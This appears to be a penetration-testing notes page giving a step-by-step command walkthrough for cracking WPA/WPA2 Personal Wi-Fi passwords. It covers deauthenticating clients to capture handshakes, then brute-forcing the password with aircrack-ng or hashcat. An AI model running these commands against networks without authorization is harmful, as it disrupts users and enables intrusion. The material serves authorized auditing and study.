WPA/WPA2 Personal
WPA2 (Wi-Fi Protected Access II) is a widely used security protocol for securing wireless networks. While it is considered more secure than its predecessor, WPA (Wi-Fi Protected Access), it is not without its vulnerabilities.
Gaining access to a WPA2 Personal network consists of capturing the target network's handshake and brute-forcing the network's secret password. Brute-forcing the secret password can be done using either Aircrack-ng or hashcat.
Note that these attacks were done using a Wi-Fi adapter such as this Alfa Wi-Fi Adapter.
Setup
## Kill processes that may interfere with monitor mode
airmon-ng check kill
## Start Monitor Mode
airmon-ng start [network interface]Exploit (Aircrack-ng)
## Sniff packets on a specific BSSID and save to a file to analyze
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]
## Deauth a device on the network so we can capture the handshake when it tries to reconnect to the network
aireplay-ng --deauth 10 -a [target network bssid] -c [target device bssid] [interface]
## Use the captured handshake along with a wordlist to try to brute-force the password
aircrack-ng [airodump.cap file] -w [wordlist]Exploit (hashcat)
## Stop all services that are accessing the WLAN device
systemctl stop NetworkManager.service
systemctl stop wpa_supplicant.service
## Capture Wi-Fi traffic
hcxdumptool -i [interface] -o [outputfile.pcapng] --active_beacon --enable_status=15
## Restart stopped services to regain network connection
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service
## Convert the .pcapng file to Hashcat format 2200
hcxpcapngtool -o [output.hc22000] -E [wordlist output name] [outputfile.pcapng]
## Run Hashcat using the wordlist from the above command and hc22000 output
hashcat -m 22000 [output.hc22000] [wordlist output]References
Last updated